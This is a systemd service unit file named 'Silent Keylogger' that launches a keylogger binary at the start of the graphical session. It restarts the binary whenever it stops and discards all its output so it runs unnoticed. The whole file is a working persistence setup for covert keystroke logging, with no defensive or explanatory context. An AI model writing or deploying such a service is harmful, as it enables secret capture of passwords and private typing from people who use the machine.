[Unit]
Description=Silent Keylogger
After=graphical-session.target

[Service]
Type=simple
ExecStart=/home/christoph/Documents/logged_key/keylogger
Restart=always
RestartSec=5
StandardOutput=null
StandardError=null

[Install]
WantedBy=graphical-session.target